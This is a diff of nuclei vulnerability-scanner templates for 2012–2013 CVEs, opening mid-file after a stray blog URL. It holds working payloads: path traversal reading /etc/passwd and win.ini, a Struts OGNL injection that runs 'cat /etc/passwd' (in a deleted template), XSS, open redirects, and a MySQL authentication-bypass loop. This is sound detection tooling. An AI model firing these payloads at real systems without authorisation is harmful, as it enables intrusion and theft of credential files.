https://blog.csdn.net/weixin_43416469/article/details/113850545 tags: cve,cve2012,apache,rce,struts,java - classification: - cve-id: CVE-2012-0392 requests: - method: GET @@ -22,10 +18,8 @@ requests: - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" - type: status status: - 200 - -# Enhanced by mp on 2022/02/21 diff --git a/nuclei-templates/CVE-2012/CVE-2012-0394.yaml b/nuclei-templates/CVE-2012/CVE-2012-0394.yaml index ebd945cbd4..77f250d6b7 100644 --- a/nuclei-templates/CVE-2012/CVE-2012-0394.yaml +++ b/nuclei-templates/CVE-2012/CVE-2012-0394.yaml @@ -3,9 +3,13 @@ id: CVE-2012-0394 info: name: Apache Struts <2.3.1.1 - Remote Code Execution author: tess - severity: critical + severity: medium description: | Apache Struts before 2.3.1.1 is susceptible to remote code execution. When developer mode is used in the DebuggingInterceptor component, a remote attacker can execute arbitrary OGNL commands via unspecified vectors, which can allow for execution of malware, obtaining sensitive information, modifying data, and/or gaining full control over a compromised system without entering necessary credentials.. NOTE: the vendor characterizes this behavior as not "a security vulnerability itself." + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected server. + remediation: | + Upgrade Apache Struts to a version higher than 2.3.1.1 or apply the necessary patches. reference: - https://www.pwntester.com/blog/2014/01/21/struts-2-devmode-an-ognl-backdoor/ - https://www.exploit-db.com/exploits/31434 @@ -13,21 +17,26 @@ info: - http://www.exploit-db.com/exploits/18329 - https://nvd.nist.gov/vuln/detail/CVE-2012-0394 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P + cvss-score: 6.8 cve-id: CVE-2012-0394 - cwe-id: CWE-77 + cwe-id: CWE-94 + epss-score: 0.94527 + epss-percentile: 0.99071 + cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: apache + product: struts shodan-query: html:"Struts Problem Report" - verified: "true" - tags: ognl,injection,edb,cve,cve2012,apache,struts - + tags: cve,cve2012,ognl,injection,edb,apache,struts variables: first: "{{rand_int(1000, 9999)}}" second: "{{rand_int(1000, 9999)}}" result: "{{to_number(first)*to_number(second)}}" -requests: +http: - method: GET path: - '{{BaseURL}}/portal/displayAPSForm.action?debug=command&expression={{first}}*{{second}}' @@ -41,5 +50,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2023/01/30 +# digest: 4a0a0047304502201c0033f7d56e0c4a4fd3683b701ad52e9bfbc45406087f58789beb95e48a07b4022100aa2ad6d34f8e3503d13c60241edcdd958389ba9fbf8c1c2397823123707fd2e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2012/CVE-2012-0896.yaml b/nuclei-templates/CVE-2012/CVE-2012-0896.yaml index 17692819b2..5a0423bc41 100644 --- a/nuclei-templates/CVE-2012/CVE-2012-0896.yaml +++ b/nuclei-templates/CVE-2012/CVE-2012-0896.yaml @@ -1,28 +1,27 @@ id: CVE-2012-0896 + info: name: Count Per Day <= 3.1 - download.php f Parameter Traversal Arbitrary File Access author: daffainfo severity: high - description: An absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter. + description: Absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter. reference: - https://packetstormsecurity.com/files/108631/ - https://www.cvedetails.com/cve/CVE-2012-0896 - - http://secunia.com/advisories/47529 - - http://plugins.trac.wordpress.org/changeset/488883/count-per-day - classification: - cve-id: CVE-2012-0896 tags: cve,cve2012,lfi,wordpress,wp-plugin,traversal + requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd" + matchers-condition: and matchers: + - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" + - type: status status: - 200 - -# Enhanced by mp on 2022/02/21 diff --git a/nuclei-templates/CVE-2012/CVE-2012-0991.yaml b/nuclei-templates/CVE-2012/CVE-2012-0991.yaml deleted file mode 100644 index 7b7ae02f16..0000000000 --- a/nuclei-templates/CVE-2012/CVE-2012-0991.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: CVE-2012-0991 -info: - name: OpenEMR 4.1 - Local File Inclusion - author: daffainfo - severity: high - description: Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the formname parameter to (1) contrib/acog/print_form.php; or (2) load_form.php, (3) view_form.php, or (4) trend_form.php in interface/patient_file/encounter. - reference: - - https://www.exploit-db.com/exploits/36650 - - https://www.cvedetails.com/cve/CVE-2012-0991 - - http://web.archive.org/web/20210121221715/https://www.securityfocus.com/bid/51788/ - - http://osvdb.org/78729 - classification: - cve-id: CVE-2012-0991 - tags: cve,cve2012,lfi,openemr,traversal -requests: - - method: GET - path: - - "{{BaseURL}}/contrib/acog/print_form.php?formname=../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/21 diff --git a/nuclei-templates/CVE-2012/CVE-2012-0996.yaml b/nuclei-templates/CVE-2012/CVE-2012-0996.yaml index b07358c35b..b096e5a0ba 100644 --- a/nuclei-templates/CVE-2012/CVE-2012-0996.yaml +++ b/nuclei-templates/CVE-2012/CVE-2012-0996.yaml @@ -1,4 +1,5 @@ id: CVE-2012-0996 + info: name: 11in1 CMS 1.2.1 - Local File Inclusion (LFI) author: daffainfo @@ -7,22 +8,20 @@ info: reference: - https://www.exploit-db.com/exploits/36784 - https://www.cvedetails.com/cve/CVE-2012-0996 - - https://www.htbridge.ch/advisory/HTB23071 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2012-0996 tags: cve,cve2012,lfi + requests: - method: GET path: - "{{BaseURL}}/index.php?class=../../../../../../../etc/passwd%00" + matchers-condition: and matchers: + - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" + - type: status status: - - 200 - -# Enhanced by mp on 2022/02/18 + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2012/CVE-2012-2122.yaml b/nuclei-templates/CVE-2012/CVE-2012-2122.yaml new file mode 100644 index 0000000000..f303e06e97 --- /dev/null +++ b/nuclei-templates/CVE-2012/CVE-2012-2122.yaml @@ -0,0 +1,61 @@ +id: CVE-2012-2122 + +info: + name: MySQL - Authentication Bypass + author: pussycat0x + severity: medium + description: | + sql/password.c in Oracle MySQL 5.1.x before 5.1.63, 5.5.x before 5.5.24, and 5.6.x before 5.6.6, and MariaDB 5.1.x before 5.1.62, 5.2.x before 5.2.12, 5.3.x before 5.3.6, and 5.5.x before 5.5.23, when running in certain environments with certain implementations of the memcmp function, allows remote attackers to bypass authentication by repeatedly authenticating with the same incorrect password, which eventually causes a token comparison to succeed due to an improperly-checked return value. + reference: + - https://github.com/vulhub/vulhub/tree/master/mysql/CVE-2012-2122 + - http://kb.askmonty.org/en/mariadb-5162-release-notes/ + - http://lists.opensuse.org/opensuse-security-announce/2012-08/msg00007.html + - http://security.gentoo.org/glsa/glsa-201308-06.xml + - http://securitytracker.com/id?1027143 + classification: + cvss-metrics: CVSS:2.0/AV:N/AC:H/Au:N/C:P/I:P/A:P + cvss-score: 5.1 + cve-id: CVE-2012-2122 + cwe-id: CWE-287 + epss-score: 0.97019 + epss-percentile: 0.99732 + cpe: cpe:2.3:a:oracle:mysql:5.1.51:*:*:*:*:*:*:* + metadata: + verified: true + vendor: oracle + product: mysql + shodan-query: product:"MySQL" + tags: cve,cve2012,js,enum,network,mssql,fuzz + +javascript: + - code: | + const mysql = require('nuclei/mysql'); + const client = new mysql.MySQLClient; + for (let i = 1; i <= 1001; i++) { + try { + const connected = client.ExecuteQuery(Host, Port, User, Pass, Query); + Export(connected); + break; + } catch { + // error + } + } + + args: + Host: "{{Host}}" + Port: 3306 + User: "root" + Pass: "wrong" + Query: "show databases;" + + matchers: + - type: dsl + dsl: + - "success == true" + + extractors: + - type: json + part: response + json: + - .Rows[] | .Database +# digest: 4a0a004730450220257cea6847023e5a3eadf5c1a18c4f2a2df145542fe09c89c61ddad28bfe44e9022100e5936a8580cc7882f2e8c441aff795b4fc479fa6552599a3eb1abca1ac7f9a65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2012/CVE-2012-4032.yaml b/nuclei-templates/CVE-2012/CVE-2012-4032.yaml index 78738fb7c4..b1dc2b670f 100644 --- a/nuclei-templates/CVE-2012/CVE-2012-4032.yaml +++ b/nuclei-templates/CVE-2012/CVE-2012-4032.yaml @@ -6,26 +6,45 @@ info: severity: medium description: | Open redirect vulnerability in the login page in WebsitePanel before 1.2.2.1 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in ReturnUrl to Default.aspx + impact: | + An attacker can trick users into visiting a malicious website, leading to potential phishing attacks or further exploitation. + remediation: | + Upgrade to WebsitePanel v1.2.2.1 or later to fix the open redirect vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2012-4032 - https://www.exploit-db.com/exploits/37488 - https://packetstormsecurity.com/files/114541/WebsitePanel-CMS-Open-Redirect.html - https://exchange.xforce.ibmcloud.com/vulnerabilities/76803 + - http://websitepanel.codeplex.com/workitem/224 classification: - cvss-metrics: AV:N/AC:M/Au:N/C:P/I:P/A:N + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N cvss-score: 5.8 cve-id: CVE-2012-4032 cwe-id: CWE-20 + epss-score: 0.00951 + epss-percentile: 0.81499 cpe: cpe:2.3:a:websitepanel:websitepanel:*:*:*:*:*:*:*:* - tags: cve,cve2012,redirect,websitepanel + metadata: + max-request: 1 + vendor: websitepanel + product: websitepanel + shodan-query: title:"WebsitePanel" html:"login" + tags: cve,cve2012,packetstorm,redirect,websitepanel,authenticated http: - - method: GET - path: - - "{{BaseURL}}/hosting/Default.aspx?pid=Login&ReturnUrl=http%3A%2F%2Fwww.interact.sh" + - raw: + - | + POST /Default.aspx?pid=Login&ReturnUrl=http%3A%2F%2Fwww.interact.sh HTTP/1.1 + Host: {{Hostname}} + Cookie: UserCulture=en-US; .WEBSITEPANELPORTALAUTHASPX= + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 + Content-Type: application/x-www-form-urlencoded + + ctl03%24ctl01%24ctl00%24txtUsername={{username}}&ctl03%24ctl01%24ctl00%24txtPassword={{password}}&ctl03%24ctl01%24ctl00%24btnLogin=+++Sign+In+++&ctl03%24ctl01%24ctl00%24ddlLanguage=en-US&ctl03%24ctl01%24ctl00%24ddlTheme=Default matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' + - '(?m)^(?:Location\s*?:\s*?)(?:http?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' +# digest: 4a0a00473045022100ee9d837e70b676d11e501a5486b5c0d956d0fde58e815eee2d49972196ce1a6802207e4e2e3002e677556026c5984d545360653b9b6730f239e6470757314a608880:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2012/CVE-2012-4253.yaml b/nuclei-templates/CVE-2012/CVE-2012-4253.yaml index 59c53c9ec0..7bc7888e98 100644 --- a/nuclei-templates/CVE-2012/CVE-2012-4253.yaml +++ b/nuclei-templates/CVE-2012/CVE-2012-4253.yaml @@ -1,4 +1,5 @@ id: CVE-2012-4253 + info: name: MySQLDumper 1.24.4 - Directory Traversal author: daffainfo @@ -7,22 +8,20 @@ info: reference: - https://www.exploit-db.com/exploits/37129 - https://www.cvedetails.com/cve/CVE-2012-4253 - - http://www.osvdb.org/81609 - - http://www.osvdb.org/81615 - classification: - cve-id: CVE-2012-4253 tags: cve,cve2012,lfi + requests: - method: GET path: - "{{BaseURL}}/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: + - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" + - type: status status: - 200 - -# Enhanced by mp on 2022/02/21 diff --git a/nuclei-templates/CVE-2012/CVE-2012-4547.yaml b/nuclei-templates/CVE-2012/CVE-2012-4547.yaml index 9025770e0a..91de9be6c3 100644 --- a/nuclei-templates/CVE-2012/CVE-2012-4547.yaml +++ b/nuclei-templates/CVE-2012/CVE-2012-4547.yaml @@ -8,11 +8,7 @@ info: reference: - https://www.exploit-db.com/exploits/36164 - https://nvd.nist.gov/vuln/detail/CVE-2012-4547 - - http://awstats.sourceforge.net/docs/awstats_changelog.txt - - http://openwall.com/lists/oss-security/2012/10/29/7 - classification: - cve-id: CVE-2012-4547 - tags: cve,cve2012,xss,awstats + tags: cve,cve2020,xss,awstats requests: - method: GET @@ -35,6 +31,4 @@ requests: - type: status status: - - 200 - -# Enhanced by mp on 2022/02/21 + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2012/CVE-2012-4768.yaml b/nuclei-templates/CVE-2012/CVE-2012-4768.yaml deleted file mode 100644 index cc4e27599b..0000000000 --- a/nuclei-templates/CVE-2012/CVE-2012-4768.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2012-4768 -info: - name: WordPress Plugin Download Monitor < 3.3.5.9 - Reflected Cross-Site Scripting - author: daffainfo - severity: medium - description: A cross-site scripting vulnerability in the Download Monitor plugin before 3.3.5.9 for WordPress allows remote attackers to inject arbitrary web script or HTML via the dlsearch parameter to the default URI. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2012-4768 - - http://packetstormsecurity.org/files/116408/wpdownloadmonitor3357-xss.txt - - http://osvdb.org/85319 - - http://www.reactionpenetrationtesting.co.uk/wordpress-download-monitor-xss.html - classification: - cve-id: CVE-2012-4768 - tags: cve,cve2012,wordpress,xss,wp-plugin -requests: - - method: GET - path: - - '{{BaseURL}}/?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/21 diff --git a/nuclei-templates/CVE-2012/CVE-2012-4940.yaml b/nuclei-templates/CVE-2012/CVE-2012-4940.yaml deleted file mode 100644 index b89245caf1..0000000000 --- a/nuclei-templates/CVE-2012/CVE-2012-4940.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2012-4940 - -info: - name: Axigen Mail Server Filename Directory Traversal - author: dhiyaneshDk - severity: high - description: Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in an edit or delete action to the default URI. - reference: - - https://www.exploit-db.com/exploits/37996 - - https://nvd.nist.gov/vuln/detail/CVE-2012-4940 - tags: cve,cve2012,axigen,lfi,mail - classification: - cve-id: CVE-2012-4940 - -requests: - - method: GET - path: - - '{{BaseURL}}/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\..\..\windows\win.ini' - - '{{BaseURL}}/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\..\..\windows\win.ini' - - stop-at-first-match: true - matchers: - - type: word - part: body - words: - - "bit app support" - - "fonts" - - "extensions" - condition: and - -# Enhanced by cs on 2022/02/25 diff --git a/nuclei-templates/CVE-2012/CVE-2012-4982.yaml b/nuclei-templates/CVE-2012/CVE-2012-4982.yaml index 2e859ee809..f427fcec55 100644 --- a/nuclei-templates/CVE-2012/CVE-2012-4982.yaml +++ b/nuclei-templates/CVE-2012/CVE-2012-4982.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Open redirect vulnerability in assets/login on the Forescout CounterACT NAC device before 7.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the 'a' parameter. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the download of malware. remediation: | Apply the latest security patches or upgrade to a newer version of Forescout CounterACT to fix the open redirect vulnerability. reference: @@ -13,13 +15,14 @@ info: - https://www.reactionpenetrationtesting.co.uk/forescout-cross-site-redirection.html - https://nvd.nist.gov/vuln/detail/CVE-2012-4982 - http://www.reactionpenetrationtesting.co.uk/forescout-cross-site-redirection.html + - https://github.com/tr3ss/newclei classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N cvss-score: 5.8 cve-id: CVE-2012-4982 cwe-id: CWE-20 - epss-score: 0.00763 - epss-percentile: 0.79082 + epss-score: 0.00357 + epss-percentile: 0.71561 cpe: cpe:2.3:a:forescout:counteract:6.3.4.10:*:*:*:*:*:*:* metadata: max-request: 1 @@ -37,4 +40,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 490a00463044022038910e0cb3be99200a8bcd988110043e50952c2a72983c860643bbda07a7816402206cba8ce4110069dde15118d53dd83acef5fa819d9d9981e17c838daa45fcaccb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a867f8c46181e25c0ee65381c656fd5b0908d6074f18923c3e96c2754c8995b8022100888f743fb311fd2ddba83def7cad4a6946a20a18d6b17fa3ed8b1151808c8154:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2012/CVE-2012-5321.yaml b/nuclei-templates/CVE-2012/CVE-2012-5321.yaml index 16f166f839..c9a6ae8f37 100644 --- a/nuclei-templates/CVE-2012/CVE-2012-5321.yaml +++ b/nuclei-templates/CVE-2012/CVE-2012-5321.yaml @@ -1,31 +1,43 @@ id: CVE-2012-5321 info: - name: TikiWiki CMS/Groupware v8.3 - Open Redirect + name: TikiWiki CMS Groupware v8.3 - Open Redirect author: ctflearner severity: medium description: | tiki-featured_link.php in TikiWiki CMS/Groupware 8.3 allows remote attackers to load arbitrary web site pages into frames and conduct phishing attacks via the url parameter, aka "frame injection + impact: | + Successful exploitation of this vulnerability could lead to phishing attacks and potential unauthorized access to sensitive information. + remediation: | + Apply the latest security patches or upgrade to a newer version of TikiWiki CMS Groupware to mitigate the risk of open redirect vulnerabilities. reference: - https://nvd.nist.gov/vuln/detail/CVE-2012-5321 - https://www.exploit-db.com/exploits/36848 - http://st2tea.blogspot.com/2012/02/tiki-wiki-cms-groupware-frame-injection.html - https://exchange.xforce.ibmcloud.com/vulnerabilities/73403 classification: - cvss-metrics: (AV:N/AC:M/Au:N/C:P/I:P/A:N) + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N cvss-score: 5.8 cve-id: CVE-2012-5321 cwe-id: CWE-20 + epss-score: 0.01926 + epss-percentile: 0.87386 cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:8.3:*:*:*:*:*:*:* - tags: cve,cve2012,redirect,TikiWiki,CMS/Groupware + metadata: + max-request: 1 + vendor: tiki + product: tikiwiki_cms\/groupware + shodan-query: http.html:"tiki wiki" + tags: cve,cve2012,redirect,tikiwiki,groupware,tiki http: - method: GET path: - - "{{BaseURL}}/tiki-featured_link.php?type=f&url=http://interact.sh" + - "{{BaseURL}}/tiki-featured_link.php?type=f&url=https://interact.sh" matchers: - type: regex part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' +# digest: 4a0a0047304502200b62703373e2f3e77eb8233099e45a6a4a8f45c65a0bc93dff836558b4cfb495022100c5fdc97c693593011215fd012ea56914958970b70e474b725121e087a9eeb6b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2012/CVE-2012-6499.yaml b/nuclei-templates/CVE-2012/CVE-2012-6499.yaml index 51013875b4..7eade9c1f7 100644 --- a/nuclei-templates/CVE-2012/CVE-2012-6499.yaml +++ b/nuclei-templates/CVE-2012/CVE-2012-6499.yaml @@ -6,25 +6,39 @@ info: severity: medium description: | Open redirect vulnerability in age-verification.php in the Age Verification plugin 0.4 and earlier for WordPress allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect_to parameter. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware. + remediation: | + Update to the latest version of the WordPress Plugin Age Verification or remove the plugin if not needed. reference: - - https://www.exploit-db.com/exploits/36540 + - https://www.exploit-db.com/exploits/18350 - https://wordpress.org/plugins/age-verification - https://nvd.nist.gov/vuln/detail/CVE-2012-6499 classification: - cvss-metrics: AV:N/AC:M/Au:N/C:P/I:P/A:N + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N cvss-score: 5.8 cve-id: CVE-2012-6499 cwe-id: CWE-20 + epss-score: 0.01204 + epss-percentile: 0.83755 cpe: cpe:2.3:a:age_verification_project:age_verification:*:*:*:*:*:*:*:* - tags: cve,cve2012,wordpress,wp,wp-plugin,redirect,age-verification + metadata: + max-request: 1 + vendor: age_verification_project + product: age_verification + tags: cve,cve2012,wordpress,wp,wp-plugin,redirect,age-verification,age_verification_project http: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/age-verification/age-verification.php?redirect_to=http%3A%2F%2Fwww.interact.sh" + - raw: + - | + POST /wp-content/plugins/age-verification/age-verification.php HTTP/1.1 + Host: {{Hostname}} + + redirect_to=http://www.interact.sh&age_day=1&age_month=1&age_year=1970 matchers: - type: regex part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' +# digest: 4b0a00483046022100c6dc5b887e4ace1683bd8c4f901328e58b99002898e4ca33ed7adf2eead45ac6022100a33436c7adb1f789a65f478a78a2d645cf1b42813d472aa216d6621bb137fe5e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2012/CVE-2012-0901.yaml b/nuclei-templates/CVE-2012/cve-2012-0901.yaml similarity index 100% rename from nuclei-templates/CVE-2012/CVE-2012-0901.yaml rename to nuclei-templates/CVE-2012/cve-2012-0901.yaml diff --git a/nuclei-templates/CVE-2012/CVE-2012-0981.yaml b/nuclei-templates/CVE-2012/cve-2012-0981.yaml similarity index 100% rename from nuclei-templates/CVE-2012/CVE-2012-0981.yaml rename to nuclei-templates/CVE-2012/cve-2012-0981.yaml diff --git a/nuclei-templates/CVE-2012/cve-2012-0991.yaml b/nuclei-templates/CVE-2012/cve-2012-0991.yaml new file mode 100644 index 0000000000..c9bbdc69ff --- /dev/null +++ b/nuclei-templates/CVE-2012/cve-2012-0991.yaml @@ -0,0 +1,27 @@ +id: CVE-2012-0991 + +info: + name: OpenEMR 4.1 - Local File Inclusion + author: daffainfo + severity: high + description: Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the formname parameter to (1) contrib/acog/print_form.php; or (2) load_form.php, (3) view_form.php, or (4) trend_form.php in interface/patient_file/encounter. + reference: + - https://www.exploit-db.com/exploits/36650 + - https://www.cvedetails.com/cve/CVE-2012-0991 + tags: cve,cve2012,lfi,openemr,traversal + +requests: + - method: GET + path: + - "{{BaseURL}}/contrib/acog/print_form.php?formname=../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2012/CVE-2012-3153.yaml b/nuclei-templates/CVE-2012/cve-2012-3153.yaml old mode 100644 new mode 100755 similarity index 100% rename from nuclei-templates/CVE-2012/CVE-2012-3153.yaml rename to nuclei-templates/CVE-2012/cve-2012-3153.yaml diff --git a/nuclei-templates/CVE-2012/cve-2012-4768.yaml b/nuclei-templates/CVE-2012/cve-2012-4768.yaml new file mode 100644 index 0000000000..5c198776f4 --- /dev/null +++ b/nuclei-templates/CVE-2012/cve-2012-4768.yaml @@ -0,0 +1,30 @@ +id: CVE-2012-4768 + +info: + name: WordPress Plugin Download Monitor < 3.3.5.9 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Cross-site scripting (XSS) vulnerability in the Download Monitor plugin before 3.3.5.9 for WordPress allows remote attackers to inject arbitrary web script or HTML via the dlsearch parameter to the default URI. + reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4768 + tags: cve,cve2012,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2012/cve-2012-4940.yaml b/nuclei-templates/CVE-2012/cve-2012-4940.yaml new file mode 100644 index 0000000000..6e9ed3f4d9 --- /dev/null +++ b/nuclei-templates/CVE-2012/cve-2012-4940.yaml @@ -0,0 +1,25 @@ +id: CVE-2012-4940 + +info: + name: Axigen Mail Server - 'Filename' Directory Traversal + author: dhiyaneshDk + severity: high + description: Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in (1) the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in (2) an edit action or (3) a delete action to the default URI. + reference: https://www.exploit-db.com/exploits/37996 + tags: cve,cve2012,axigen,lfi,mail + +requests: + - method: GET + path: + - '{{BaseURL}}/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\..\..\windows\win.ini' + - '{{BaseURL}}/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\..\..\windows\win.ini' + + stop-at-first-match: true + matchers: + - type: word + part: body + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and diff --git a/nuclei-templates/CVE-2012/CVE-2012-5913.yaml b/nuclei-templates/CVE-2012/cve-2012-5913.yaml similarity index 100% rename from nuclei-templates/CVE-2012/CVE-2012-5913.yaml rename to nuclei-templates/CVE-2012/cve-2012-5913.yaml diff --git a/nuclei-templates/CVE-2013/CVE-2013-1965.yaml b/nuclei-templates/CVE-2013/CVE-2013-1965.yaml deleted file mode 100644 index c5610c6070..0000000000 --- a/nuclei-templates/CVE-2013/CVE-2013-1965.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2013-1965 -info: - name: Apache Struts2 S2-012 RCE - author: pikpikcu - severity: critical - description: Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.3, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect. - reference: - - http://struts.apache.org/development/2.x/docs/s2-012.html - - https://nvd.nist.gov/vuln/detail/CVE-2013-1965 - - https://bugzilla.redhat.com/show_bug.cgi?id=967655 - remediation: Developers should immediately upgrade to Struts 2.3.14.3 or later. - classification: - cve-id: CVE-2013-1965 - tags: cve,cve2013,apache,rce,struts,ognl -requests: - - method: POST - path: - - "{{BaseURL}}/user.action" - headers: - Content-Type: application/x-www-form-urlencoded - body: | - name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/21 diff --git a/nuclei-templates/CVE-2013/CVE-2013-2248.yaml b/nuclei-templates/CVE-2013/CVE-2013-2248.yaml deleted file mode 100644 index 34b38eeb71..0000000000 --- a/nuclei-templates/CVE-2013/CVE-2013-2248.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: CVE-2013-2248 - -info: - name: Apache Struts CVE-2013-2248 Multiple Open Redirection Vulnerabilities - author: 0x_Akoko - description: Apache Struts is prone to multiple open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input. - reference: https://www.exploit-db.com/exploits/38666 - severity: low - tags: apache,redirect - -requests: - - method: GET - path: - - "{{BaseURL}}/struts2-showcase/fileupload/upload.action?redirect:http://www.example.com/" - - "{{BaseURL}}/struts2-showcase/modelDriven/modelDriven.action?redirectAction:http://www.example.com/%23" - - matchers: - - type: regex - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - part: header diff --git a/nuclei-templates/CVE-2013/cve-2013-2251.yaml b/nuclei-templates/CVE-2013/CVE-2013-2251.yaml similarity index 100% rename from 